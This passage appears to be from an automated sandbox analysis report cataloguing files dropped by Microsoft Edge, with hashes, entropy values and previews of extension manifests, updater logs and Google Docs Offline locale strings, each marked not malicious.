                                                                                                                                                                                                                                                                                                                          Preview:{"logTime": "1004/133448", "correlationVector":"vYS73lRT+EoO2Owh9jsc+Y","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133448", "correlationVector":"n/KhuHPhHmYXokB31+JZz7","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133448", "correlationVector":"fclQx26bUZO07waFEDe6Fn","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133448", "correlationVector":"0757l0tkKt37vNrdCKAm8w","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133449", "correlationVector":"uTRRkmbbqkgK/wPBCS4fct","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133449", "correlationVector":"2DrXipL1ngF91RN7IemK0e","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/134324", "correlationVector":"d0GyjEgnW85fvDIojHVIXI","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/134324", "correlationVector":"PvfzGWRutB/kmuXUK+c8XA","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/134324", "correlationVector":"29CB75FBC4C942E0817A1F7A0E2CF647
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):1
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                                                          MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                                                          SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                                                          SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                                                          SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:.
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):11185
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.951995436832936
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                                                                                                                                                                          MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                                                                                                                                                                          SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                                                                                                                                                                          SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                                                                                                                                                                          SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):1753
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.8889033066924155
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:48:Pxpr7Xka2NXDpfsBJODI19Kg1JqcJW9O//JE3ZBDcpu/x:L3XgNSz9/4kIO3u3Xgpq
                                                                                                                                                                                                                                                                                                                          MD5:738E757B92939B24CDBBD0EFC2601315
                                                                                                                                                                                                                                                                                                                          SHA1:77058CBAFA625AAFBEA867052136C11AD3332143
                                                                                                                                                                                                                                                                                                                          SHA-256:D23B2BA94BA22BBB681E6362AE5870ACD8A3280FA9E7241B86A9E12982968947
                                                                                                                                                                                                                                                                                                                          SHA-512:DCA3E12DD5A9F1802DB6D11B009FCE2B787E79B9F730094367C9F26D1D87AF1EA072FF5B10888648FB1231DD83475CF45594BB0C9915B655EE363A3127A5FFC2
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:[.. {.. "description": "treehash per file",.. "signed_content": {.. "payload": "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",.. "signatures": [.. {.. "header": {.. "kid": "publisher".. },.. "protected": "eyJhbGciOiJSUzI1NiJ9",.. "signature": "UglEEilkOml5P1W0X6wc-_dB87PQB73uMir11923av57zPKujb4IUe_lbGpn7cRZsy6x-8i9eEKxAW7L2TSmYqrcp4XtiON6ppcf27FWACXOUJDax9wlMr-EOtyZhykCnB9vR
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (8031), with no line terminators
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):9815
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):6.1716321262973315
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3zEScQZBMX:+ThBVq3npozftROQIyVfjRZGB365Ey97
                                                                                                                                                                                                                                                                                                                          MD5:3D20584F7F6C8EAC79E17CCA4207FB79
                                                                                                                                                                                                                                                                                                                          SHA1:3C16DCC27AE52431C8CDD92FBAAB0341524D3092
                                                                                                                                                                                                                                                                                                                          SHA-256:0D40A5153CB66B5BDE64906CA3AE750494098F68AD0B4D091256939EEA243643
                                                                                                                                                                                                                                                                                                                          SHA-512:315D1B4CC2E70C72D7EB7D51E0F304F6E64AC13AE301FD2E46D585243A6C936B2AD35A0964745D291AE9B317C316A29760B9B9782C88CC6A68599DB531F87D59
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (8604), with no line terminators
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):10388
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):6.174387413738973
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3EbmE1F4fn:+ThBVq3npozftROQIyVfjRZGB365Ey9+
                                                                                                                                                                                                                                                                                                                          MD5:3DE1E7D989C232FC1B58F4E32DE15D64
                                                                                                                                                                                                                                                                                                                          SHA1:42B152EA7E7F31A964914F344543B8BF14B5F558
                                                                                                                                                                                                                                                                                                                          SHA-256:D4AA4602A1590A4B8A1BCE8B8D670264C9FB532ADC97A72BC10C43343650385A
                                                                                                                                                                                                                                                                                                                          SHA-512:177E5BDF3A1149B0229B6297BAF7B122602F7BD753F96AA41CCF2D15B2BCF6AF368A39BB20336CCCE121645EC097F6BEDB94666C74ACB6174EB728FBFC43BC2A
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):962
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.698567446030411
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:24:1Hg9+D3DRnbuF2+sUrzUu+Y9VwE+Fg41T1O:NBqY+6E+F7JO
                                                                                                                                                                                                                                                                                                                          MD5:E805E9E69FD6ECDCA65136957B1FB3BE
                                                                                                                                                                                                                                                                                                                          SHA1:2356F60884130C86A45D4B232A26062C7830E622
                                                                                                                                                                                                                                                                                                                          SHA-256:5694C91F7D165C6F25DAF0825C18B373B0A81EA122C89DA60438CD487455FD6A
                                                                                                                                                                                                                                                                                                                          SHA-512:049662EF470D2B9E030A06006894041AE6F787449E4AB1FBF4959ADCB88C6BB87A957490212697815BB3627763C01B7B243CF4E3C4620173A95795884D998A75
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{.. "content_scripts": [ {.. "js": [ "content.js" ],.. "matches": [ "https://chrome.google.com/webstore/*" ].. }, {.. "js": [ "content_new.js" ],.. "matches": [ "https://chromewebstore.google.com/*" ].. } ],.. "description": "Edge relevant text changes on select websites to improve user experience and precisely surfaces the action they want to take.",.. "key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu06p2Mjoy6yJDUUjCe8Hnqvtmjll73XqcbylxFZZWe+MCEAEK+1D0Nxrp0+IuWJL02CU3jbuR5KrJYoezA36M1oSGY5lIF/9NhXWEx5GrosxcBjxqEsdWv/eDoOOEbIvIO0ziMv7T1SUnmAA07wwq8DXWYuwlkZU/PA0Mxx0aNZ5+QyMfYqRmMpwxkwPG8gyU7kmacxgCY1v7PmmZo1vSIEOBYrxl064w5Q6s/dpalSJM9qeRnvRMLsszGY/J2bjQ1F0O2JfIlBjCOUg/89+U8ZJ1mObOFrKO4um8QnenXtH0WGmsvb5qBNrvbWNPuFgr2+w5JYlpSQ+O8zUCb8QZwIDAQAB",.. "manifest_version": 3,.. "name": "Edge relevant text changes",.. "update_url": "https://edge.microsoft.com/extensionwebstorebase/v1/crx",.. "version": "1.2.1"..}..
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):154477
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.835886983924039
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:3072:edP3YiyHk53xr3zWwaFYgn5JFug0HjaHNK7XeSD/r/pLbWNiOAo1np:edPYJHAzyVu7HjacuSD/rBPBOJnp
                                                                                                                                                                                                                                                                                                                          MD5:14937B985303ECCE4196154A24FC369A
                                                                                                                                                                                                                                                                                                                          SHA1:ECFE89E11A8D08CE0C8745FF5735D5EDAD683730
                                                                                                                                                                                                                                                                                                                          SHA-256:71006A5311819FEF45C659428944897184880BCDB571BF68C52B3D6EE97682FF
                                                                                                                                                                                                                                                                                                                          SHA-512:1D03C75E4D2CD57EEE7B0E93E2DE293B41F280C415FB2446AC234FC5AFD11FE2F2FCC8AB9843DB0847C2CE6BD7DF7213FCF249EA71896FBF6C0696E3F5AEE46C
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):4982
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.929761711048726
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:96:L7Rf7U1ylWb3KfyEfOXE+PIcvBirQFiAql1ZwKREkXCSAk:pTvWqfD+gl0sAql1u7kySAk
                                                                                                                                                                                                                                                                                                                          MD5:913064ADAAA4C4FA2A9D011B66B33183
                                                                                                                                                                                                                                                                                                                          SHA1:99EA751AC2597A080706C690612AEEEE43161FC1
                                                                                                                                                                                                                                                                                                                          SHA-256:AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
                                                                                                                                                                                                                                                                                                                          SHA-512:162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):908
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.512512697156616
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvgMTCBxNB+kCIww3v+BBJ/wjsV8lCBxeBeRiGTCSU8biHULaBg/4srCBhUJJ:1HAkkJ+kCIwEg/wwbw0PXa22QLWmSDg
                                                                                                                                                                                                                                                                                                                          MD5:12403EBCCE3AE8287A9E823C0256D205
                                                                                                                                                                                                                                                                                                                          SHA1:C82D43C501FAE24BFE05DB8B8F95ED1C9AC54037
                                                                                                                                                                                                                                                                                                                          SHA-256:B40BDE5B612CFFF936370B32FB0C58CC205FC89937729504C6C0B527B60E2CBA
                                                                                                                                                                                                                                                                                                                          SHA-512:153401ECDB13086D2F65F9B9F20ACB3CEFE5E2AEFF1C31BA021BE35BF08AB0634812C33D1D34DA270E5693A8048FC5E2085E30974F6A703F75EA1622A0CA0FFD
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "SKEP NUWE".. },.. "explanationofflinedisabled": {.. "message": "Jy is vanlyn. As jy Google Dokumente sonder 'n internetverbinding wil gebruik, moet jy die volgende keer as jy aan die internet gekoppel is na instellings op die Google Dokumente-tuisblad gaan en vanlynsinkronisering aanskakel.".. },.. "explanationofflineenabled": {.. "message": "Jy is vanlyn, maar jy kan nog steeds beskikbare l.ers redigeer of nuwes skep.".. },.. "extdesc": {.. "message": "Skep, wysig en bekyk jou dokumente, sigblaaie en aanbiedings . alles sonder toegang tot die internet.".. },.. "extname": {.. "message": "Google Vanlyn Dokumente".. },.. "learnmore": {.. "message": "Kom meer te wete".. },.. "popuphelptext": {.. "message": "Skryf, redigeer en werk saam, waar jy ook al is, met of sonder 'n internetverbinding.".. }..}..
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):1285
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.702209356847184
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:24:1HAn6bfEpxtmqMI91ivWjm/6GcCIoToCZzlgkX/Mj:W6bMt3MITFjm/Pcd4oCZhg6k
                                                                                                                                                                                                                                                                                                                          MD5:9721EBCE89EC51EB2BAEB4159E2E4D8C
                                                                                                                                                                                                                                                                                                                          SHA1:58979859B28513608626B563138097DC19236F1F
                                                                                                                                                                                                                                                                                                                          SHA-256:3D0361A85ADFCD35D0DE74135723A75B646965E775188F7DCDD35E3E42DB788E
                                                                                                                                                                                                                                                                                                                          SHA-512:FA3689E8663565D3C1C923C81A620B006EA69C99FB1EB15D07F8F45192ED9175A6A92315FA424159C1163382A3707B25B5FC23E590300C62CBE2DACE79D84871
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):1244
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.5533961615623735
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvgPCBxNhieFTr9ogjIxurIyJCCBxeh6wAZKn7uCSUhStuysUm+WCBhSueW1Y:1HAgJzoaC6VEn7Css8yoXzzd
                                                                                                                                                                                                                                                                                                                          MD5:3EC93EA8F8422FDA079F8E5B3F386A73
                                                                                                                                                                                                                                                                                                                          SHA1:24640131CCFB21D9BC3373C0661DA02D50350C15
                                                                                                                                                                                                                                                                                                                          SHA-256:ABD0919121956AB535E6A235DE67764F46CFC944071FCF2302148F5FB0E8C65A
                                                                                                                                                                                                                                                                                                                          SHA-512:F40E879F85BC9B8120A9B7357ED44C22C075BF065F45BEA42BD5316AF929CBD035D5D6C35734E454AEF5B79D378E51A77A71FA23F9EBD0B3754159718FCEB95C
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):977
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.867640976960053
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:24:1HAWNjbwlmyuAoW32Md+80cVLdUSERHtRo3SjX:J3wlzs42m+8TV+S4H0CjX
                                                                                                                                                                                                                                                                                                                          MD5:9A798FD298008074E59ECC253E2F2933
                                                                                                                                                                                                                                                                                                                          SHA1:1E93DA985E880F3D3350FC94F5CCC498EFC8C813
                                                                                                                                                                                                                                                                                                                          SHA-256:628145F4281FA825D75F1E332998904466ABD050E8B0DC8BB9B6A20488D78A66
                                                                                                                                                                                                                                                                                                                          SHA-512:9094480379F5AB711B3C32C55FD162290CB0031644EA09A145E2EF315DA12F2E55369D824AF218C3A7C37DD9A276AEEC127D8B3627D3AB45A14B0191ED2BBE70
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "YEN.S.N. YARADIN".. },.. "explanationofflinedisabled": {.. "message": "Oflayns.n.z. Google S.n.di internet ba.lant.s. olmadan istifad. etm.k ist.yirsinizs., Google S.n.din .sas s.hif.sind. ayarlara gedin v. n.vb.ti d.f. internet. qo.ulanda oflayn sinxronizasiyan. aktiv edin.".. },.. "explanationofflineenabled": {.. "message": "Oflayns.n.z, amma m.vcud fayllar. redakt. ed. v. yenil.rini yarada bil.rsiniz.".. },.. "extdesc": {.. "message": "S.n.d, c.dv.l v. t.qdimatlar.n ham.s.n. internet olmadan redakt. edin, yarad.n v. bax.n.".. },.. "extname": {.. "message": "Google S.n.d Oflayn".. },.. "learnmore": {.. "message": ".trafl. M.lumat".. },.. "popuphelptext": {.. "message": "Harda olma..n.zdan v. internet. qo.ulu olub-olmad...n.zdan as.l. olmayaraq, yaz.n, redakt. edin v. .m.kda.l.q edin.".. }..}..
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):3107
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.535189746470889
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:48:YOWdTQ0QRk+QyJQAy6Qg4QWSe+QECTQLHQlQIfyQ0fnWQjQDrTQik+QvkZTQ+89b:GdTbyRvwgbCTEHQhyVues9oOT3rOCkV
                                                                                                                                                                                                                                                                                                                          MD5:68884DFDA320B85F9FC5244C2DD00568
                                                                                                                                                                                                                                                                                                                          SHA1:FD9C01E03320560CBBB91DC3D1917C96D792A549
                                                                                                                                                                                                                                                                                                                          SHA-256:DDF16859A15F3EB3334D6241975CA3988AC3EAFC3D96452AC3A4AFD3644C8550
                                                                                                                                                                                                                                                                                                                          SHA-512:7FF0FBD555B1F9A9A4E36B745CBFCAD47B33024664F0D99E8C080BE541420D1955D35D04B5E973C07725573E592CD0DD84FDBB867C63482BAFF6929ADA27CCDE
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):1389
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.561317517930672
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:24:1HAp1DQqUfZ+Yann08VOeadclUZbyMzZzsYvwUNn7nOyRK8/nn08V7:g1UTfZ+Ya08Uey3tflCRE08h
                                                                                                                                                                                                                                                                                                                          MD5:2E6423F38E148AC5A5A041B1D5989CC0
                                                                                                                                                                                                                                                                                                                          SHA1:88966FFE39510C06CD9F710DFAC8545672FFDCEB
                                                                                                                                                                                                                                                                                                                          SHA-256:AC4A8B5B7C0B0DD1C07910F30DCFBDF1BCB701CFCFD182B6153FD3911D566C0E
                                                                                                                                                                                                                                                                                                                          SHA-512:891FCDC6F07337970518322C69C6026896DD3588F41F1E6C8A1D91204412CAE01808F87F9F2DEA1754458D70F51C3CEF5F12A9E3FC011165A42B0844C75EC683
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):1763
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.25392954144533
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:24:1HABGtNOtIyHmVd+q+3X2AFl2DhrR7FAWS9+SMzI8QVAEq8yB0XtfOyvU7D:oshmm/+H2Ml2DrFPS9+S99EzBd7D
                                                                                                                                                                                                                                                                                                                          MD5:651375C6AF22E2BCD228347A45E3C2C9
                                                                                                                                                                                                                                                                                                                          SHA1:109AC3A912326171D77869854D7300385F6E628C
                                                                                                                                                                                                                                                                                                                          SHA-256:1DBF38E425C5C7FC39E8077A837DF0443692463BA1FBE94E288AB5A93242C46E
                                                                                                                                                                                                                                                                                                                          SHA-512:958AA7CF645FAB991F2ECA0937BA734861B373FB1C8BCC001599BE57C65E0917F7833A971D93A7A6423C5F54A4839D3A4D5F100C26EFA0D2A068516953989F9D
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):930
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.569672473374877
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvggoSCBxNFT0sXuqgEHQ2fTq9blUJYUJaw9CBxejZFPLOjCSUuE44pMiiDat:1HAtqs+BEHGpURxSp1iUPWCAXtRKe
                                                                                                                                                                                                                                                                                                                          MD5:D177261FFE5F8AB4B3796D26835F8331
                                                                                                                                                                                                                                                                                                                          SHA1:4BE708E2FFE0F018AC183003B74353AD646C1657
                                                                                                                                                                                                                                                                                                                          SHA-256:D6E65238187A430FF29D4C10CF1C46B3F0FA4B91A5900A17C5DFD16E67FFC9BD
                                                                                                                                                                                                                                                                                                                          SHA-512:E7D730304AED78C0F4A78DADBF835A22B3D8114FB41D67B2B26F4FE938B572763D3E127B7C1C81EBE7D538DA976A7A1E7ADC40F918F88AFADEA2201AE8AB47D0
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "CREA'N UN DE NOU".. },.. "explanationofflinedisabled": {.. "message": "No tens connexi.. Per utilitzar Documents de Google sense connexi. a Internet, ves a la configuraci. de la p.gina d'inici d'aquest servei i activa l'opci. per sincronitzar-se sense connexi. la propera vegada que estiguis connectat a la xarxa.".. },.. "explanationofflineenabled": {.. "message": "Tot i que no tens connexi., pots editar o crear fitxers.".. },.. "extdesc": {.. "message": "Edita, crea i consulta documents, fulls de c.lcul i presentacions, tot sense acc.s a Internet.".. },.. "extname": {.. "message": "Documents de Google sense connexi.".. },.. "learnmore": {.. "message": "M.s informaci.".. },.. "popuphelptext": {.. "message": "Escriu text, edita fitxers i col.labora-hi siguis on siguis, amb o sense connexi. a Internet.".. }..}..
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):913
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.947221919047
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvgdsbCBxNBmobXP15Dxoo60n40h6qCBxeBeGG/9jZCSUKFPDLZ2B2hCBhPLm:1HApJmoZ5e50nzQhwAd7dvYB2kDSGGKs
                                                                                                                                                                                                                                                                                                                          MD5:CCB00C63E4814F7C46B06E4A142F2DE9
                                                                                                                                                                                                                                                                                                                          SHA1:860936B2A500CE09498B07A457E0CCA6B69C5C23
                                                                                                                                                                                                                                                                                                                          SHA-256:21AE66CE537095408D21670585AD12599B0F575FF2CB3EE34E3A48F8CC71CFAB
                                                                                                                                                                                                                                                                                                                          SHA-512:35839DAC6C985A6CA11C1BFF5B8B5E59DB501FCB91298E2C41CB0816B6101BF322445B249EAEA0CEF38F76D73A4E198F2B6E25EEA8D8A94EA6007D386D4F1055
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "VYTVO.IT".. },.. "explanationofflinedisabled": {.. "message": "Jste offline. Pokud chcete Dokumenty Google pou..vat bez p.ipojen. k.internetu, a. budete p...t. online, p.ejd.te do nastaven. na domovsk. str.nce Dokument. Google a.zapn.te offline synchronizaci.".. },.. "explanationofflineenabled": {.. "message": "Jste offline, ale st.le m..ete upravovat dostupn. soubory nebo vytv..et nov..".. },.. "extdesc": {.. "message": "Upravujte, vytv..ejte a.zobrazujte sv. dokumenty, tabulky a.prezentace . v.e bez p..stupu k.internetu.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Dal.. informace".. },.. "popuphelptext": {.. "message": "Pi.te, upravujte a.spolupracujte kdekoli, s.p.ipojen.m k.internetu i.bez n.j.".. }..}..
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
